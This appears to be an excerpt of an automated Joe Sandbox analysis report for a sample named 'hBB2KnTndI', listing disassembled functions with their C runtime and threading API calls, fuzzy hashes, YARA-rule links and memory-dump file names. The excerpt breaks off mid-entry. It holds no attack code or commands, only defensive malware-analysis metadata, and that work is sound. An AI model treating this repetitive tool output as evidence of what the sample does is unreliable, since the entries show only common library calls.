Similarity

API ID: Interlocked$Decrement$IncrementObjectSingleWait
String ID:
API String ID: 1902543849-0
Opcode ID: ac243c6d47fb6acb644e9d4019d8b301f1ca1687b399c4cf8eae73d511dfb8fd
Instruction ID: 633829508d73265b3e79082120672621142c622d8accc2ab95d9b0e042c6bde1
Opcode Fuzzy Hash: ac243c6d47fb6acb644e9d4019d8b301f1ca1687b399c4cf8eae73d511dfb8fd
Instruction Fuzzy Hash: 553180717043259BC720FF79E98525ABBE4AB44344F40852EED88C7313E738E949CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004A4970 Relevance: 7.6, APIs: 5, Instructions: 81stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 004A498A
strlen.MSVCRT ref: 004A4994
memcpy.MSVCRT ref: 004A49B1
setlocale.MSVCRT ref: 004A49C5
setlocale.MSVCRT ref: 004A4A20

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 6a544106f7027919e281688b40905647d21a12d2e12b0036eebc8917641f542b
Instruction ID: 8687345bbe487251fcaa0af2a86bcd3b9f6bdb8b6e2e6ce2db56d8c068dda11d
Opcode Fuzzy Hash: 6a544106f7027919e281688b40905647d21a12d2e12b0036eebc8917641f542b
Instruction Fuzzy Hash: 12217CB0A0C3459AD301BF25DA9426EBFE0ABC2740F14495FE5C487251E3BA8851CB8E

Uniqueness

Uniqueness Score: -1.00%

Function 004A4A90 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 004A4AAA
strlen.MSVCRT ref: 004A4AB4
memcpy.MSVCRT ref: 004A4AD1
setlocale.MSVCRT ref: 004A4AE5
setlocale.MSVCRT ref: 004A4B3D

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: bbec92a826b54bb5cb6c4f170f06f8f157b58604a5e35a203f4d39478bbeb555
Instruction ID: fbc9fc1eab471a27c72d9b10338533d15b3095fa948f1fb8b2089842064d557c
Opcode Fuzzy Hash: bbec92a826b54bb5cb6c4f170f06f8f157b58604a5e35a203f4d39478bbeb555
Instruction Fuzzy Hash: C521ABB09083059FC301BF25D94436EBBE4FB82390F11895EE59447351D7B99891CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00424C59 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

wcstombs.MSVCRT ref: 00424B67
realloc.MSVCRT ref: 00424B7B
wcstombs.MSVCRT ref: 00424B94
setlocale.MSVCRT ref: 00424BA4
free.MSVCRT ref: 00424BAC
wcstombs.MSVCRT ref: 00424CF3
realloc.MSVCRT ref: 00424D0A
wcstombs.MSVCRT ref: 00424D24
setlocale.MSVCRT ref: 00424DFB
free.MSVCRT ref: 00424E03

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: wcstombs$freereallocsetlocale
String ID:
API String ID: 3931877334-0
Opcode ID: 310362af7c19dd06e783b20d20fd83c71a2ad313bbfc09c04541b3165921006f
Instruction ID: abcece6b8bad0d56c25632cb9eab241706a913f861cb8f6e8215f72835013812
Opcode Fuzzy Hash: 310362af7c19dd06e783b20d20fd83c71a2ad313bbfc09c04541b3165921006f
Instruction Fuzzy Hash: 61216D70A042328BC714AF5AE40527AF7E2FFA4740FC6C46FE4889B355E3394851DB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004A4C40 Relevance: 7.6, APIs: 5, Instructions: 65stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 004A4C5F
strlen.MSVCRT ref: 004A4CA3
memcpy.MSVCRT ref: 004A4CC0
setlocale.MSVCRT ref: 004A4CD4
setlocale.MSVCRT ref: 004A4D06

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 714b521b84fb65e29f2450c11b6a4d9ae83db5c034a3b78264dabb83cff331da
Instruction ID: 6457446ce2ea96e10c483196065656058beaf2cc32b189e1d495ee445c25e542
Opcode Fuzzy Hash: 714b521b84fb65e29f2450c11b6a4d9ae83db5c034a3b78264dabb83cff331da
Instruction Fuzzy Hash: 8D21DEB1A093149FC740EF69D58522EFBE4FF84754F85882EF6C887301E77998408B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C780 Relevance: 7.5, APIs: 5, Instructions: 43synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041C789
InterlockedIncrement.KERNEL32 ref: 0041C793
WaitForSingleObject.KERNEL32(?,?,?,?,?,004ABC2D), ref: 0041C7B2
InterlockedDecrement.KERNEL32 ref: 0041C7D3
InterlockedDecrement.KERNEL32 ref: 0041C7F3

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$CurrentIncrementObjectSingleThreadWait
String ID:
API String ID: 2637438931-0
Opcode ID: 8a8b87cf778bc855bf66f309b9431519b17429eade67d14b5b3350bab0dd8be9
Instruction ID: 8e8d3d646e82aea7b6af4e59b806f550498da207d6d8fca1cbb37e740a4d00a0
Opcode Fuzzy Hash: 8a8b87cf778bc855bf66f309b9431519b17429eade67d14b5b3350bab0dd8be9
Instruction Fuzzy Hash: F6F044F250421047DB00BF39B9C515ABBA4AF00354F4A466EDC554B246E339D984C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 004D5DF6 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004D5E0E
_free.LIBCMT ref: 004D5E20
_free.LIBCMT ref: 004D5E32
_free.LIBCMT ref: 004D5E44
_free.LIBCMT ref: 004D5E56

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 46855c866c5351ef53163e36c4815a402b49584b15205537fa47138348ff7922
Instruction ID: aea5625a3b6428b3705ee75edbcd0d7e1ea549dd2f9206033a117e2bbf740d85
Opcode Fuzzy Hash: 46855c866c5351ef53163e36c4815a402b49584b15205537fa47138348ff7922
Instruction Fuzzy Hash: 5AF0493A504600AB8664FB59F8E6D4B73DAAA447603660C2FF01CD7701CF2CFC808AAC

Uniqueness

Uniqueness Score: -1.00%

Function 004D44C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004D465D

Strings

*?, xrefs: 004D4506

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 0665bafb298977a9b8ef8d1ddf0b123d019091dca63f8e412db6d77415ba965e
Instruction ID: b3ef1bfc36ef69799d1bdc7a263400cfbd6df46fb07fabb77000a38af4a7ca8e
Opcode Fuzzy Hash: 0665bafb298977a9b8ef8d1ddf0b123d019091dca63f8e412db6d77415ba965e
Instruction Fuzzy Hash: 06612C75D00219AFCF14CFA9C8919AEFBF5EF88314B25816BE915E7300D739AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00425939 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 0042595C
strchr.MSVCRT ref: 0042596C
atoi.MSVCRT ref: 0042597B

Strings

., xrefs: 00425961

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 0b7d142242c78a21020016d2495a7eee331b1392f18b769387c1017494676eb2
Instruction ID: 3f7a3aa208dba60edff85a107b581d183756fc6b4cb5663b4bd6c7c87a13a444
Opcode Fuzzy Hash: 0b7d142242c78a21020016d2495a7eee331b1392f18b769387c1017494676eb2
Instruction Fuzzy Hash: B04183B27087648BC310AFA9E88522BF7D4EB84354F58453FE988C7311E6B9D8459786

Uniqueness

Uniqueness Score: -1.00%

Function 0041E245 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32 ref: 0041E388
abort.MSVCRT ref: 0041E43F

Strings

@, xrefs: 0041E2B4

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: IncrementInterlockedabort
String ID: @
API String ID: 2398095250-2766056989
Opcode ID: 4ac8d457e9836bd4deae4e6a931f13e3169be2ccb8320f40f3b9750029867b43
Instruction ID: d48f9652eacdd697b47c2d5395a1aa0e36a75bb33d3bed5178d654cec478a481
Opcode Fuzzy Hash: 4ac8d457e9836bd4deae4e6a931f13e3169be2ccb8320f40f3b9750029867b43
Instruction Fuzzy Hash: 73511BA41083C4E9E719CB39F94E7527FE067A1308F08859DCB858B392D3BA444DE76B

Uniqueness

Uniqueness Score: -1.00%

Function 004258C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 004258E8
strchr.MSVCRT ref: 004258F8
atoi.MSVCRT ref: 0042590B

Strings

., xrefs: 004258ED

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 345e5ffb523812b8206c80da48dd49b7a2ed69e53c663393731874981f3a1eb5
Instruction ID: 39595e7dcf24a6de65c0e846561faa14cd7b5ab7aed4101adb6fabc6f9bfb06b
Opcode Fuzzy Hash: 345e5ffb523812b8206c80da48dd49b7a2ed69e53c663393731874981f3a1eb5
Instruction Fuzzy Hash: E0F037B5A09720DBD710AF26E58422FBBE4FF84754F85881EF4C49B315D778A8809B86

Uniqueness

Uniqueness Score: -1.00%

Function 0042560C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 004255AA
strchr.MSVCRT ref: 004255BA
atoi.MSVCRT ref: 004255CD

Strings

., xrefs: 004255AF

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 48e4b067c736daaed695af5d38578999d42c0c33ddff3c1fd060f258d7b4db34
Instruction ID: afc12dcef7c589464a77ed9a62cc7547eeace0626cd27af5200ce5ae9c828d3b
Opcode Fuzzy Hash: 48e4b067c736daaed695af5d38578999d42c0c33ddff3c1fd060f258d7b4db34
Instruction Fuzzy Hash: 7D01E4B5A097118FD700EF29E48422BBBF1FF98344F55881EF88897314E779E8449B86

Uniqueness

Uniqueness Score: -1.00%

Function 004219D9 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 389COMMON

Download Yara Rule

Strings

, xrefs: 004216CD
!, xrefs: 004216BA

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: $!
API String ID: 0-2056089098
Opcode ID: 62f4035e144ffb7bcf9c3d0adf9ced64724e4c1a77f3afe9b9b2050c1f2fb94a
Instruction ID: a30091082807fa2abd26b8bd70667242850f94b7ccc4fe61594aac6a0490c52d
Opcode Fuzzy Hash: 62f4035e144ffb7bcf9c3d0adf9ced64724e4c1a77f3afe9b9b2050c1f2fb94a
Instruction Fuzzy Hash: D9F10571A087618FC760DF29D580A5EFBE1BF94344F85892EE88987311EB78E845CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00436839 Relevance: 6.4, APIs: 5, Instructions: 119stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00436854
strlen.MSVCRT ref: 00436884
strlen.MSVCRT ref: 004368DF
strlen.MSVCRT ref: 00436940
strlen.MSVCRT ref: 0043699F

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strlen$strcmp
String ID:
API String ID: 551667898-0
Opcode ID: 070ee6e3e3122e060158f34a4437db5c11b866e2f0bd46d6c00517aa2a1e31ca
Instruction ID: 6fc237d13185510f0187004fc4c7f95775dbf85702a32cea5da5ed502fc851c8
Opcode Fuzzy Hash: 070ee6e3e3122e060158f34a4437db5c11b866e2f0bd46d6c00517aa2a1e31ca
Instruction Fuzzy Hash: 4D415AB0A04A05CFCB10FF29D48456EF7E1FF88304F52886ED8959B325D738A945DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004D2DFA Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004D2E81

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 083e7ac672d413b3132a7ef9e23e68b64ed8632ad3dbf16e661d02b029cd5583
Instruction ID: cbb4a3396a4859761b78e3dff2ff6bed1c96ed02f112c609af3c02e4ed1bac28
Opcode Fuzzy Hash: 083e7ac672d413b3132a7ef9e23e68b64ed8632ad3dbf16e661d02b029cd5583
Instruction Fuzzy Hash: 77B14632A002459FDB12CF28C9A17AFBBF5EF55340F1480ABE4559B345D67C8E01CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043ACA0 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 267COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0043ACC5

Strings

2*O, xrefs: 0043AF40
basic_string::compare, xrefs: 0043AD1C, 0043ADA2, 0043AE45, 0043AF04, 0043AF20
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0043AD24, 0043ADAA, 0043AE4D, 0043AF0C, 0043AF28

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: wcslen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$2*O$basic_string::compare
API String ID: 4088430540-3502722886
Opcode ID: c8336a054c1d038116e81bfbe9b9aa55989fe4a5f09a7a1a2df2fa534117a16b
Instruction ID: b76ce2feb0b2c8b1fa829c604f3a190910a4e5ef32776a1d063171f88f8501db
Opcode Fuzzy Hash: c8336a054c1d038116e81bfbe9b9aa55989fe4a5f09a7a1a2df2fa534117a16b
Instruction Fuzzy Hash: 9681ABB2A483158B8710EE29C58041FFBE1FB98350F54D92FE9C887305E379DC618B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

Strings

{default arg#, xrefs: 0041A250
}::, xrefs: 0041A369

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
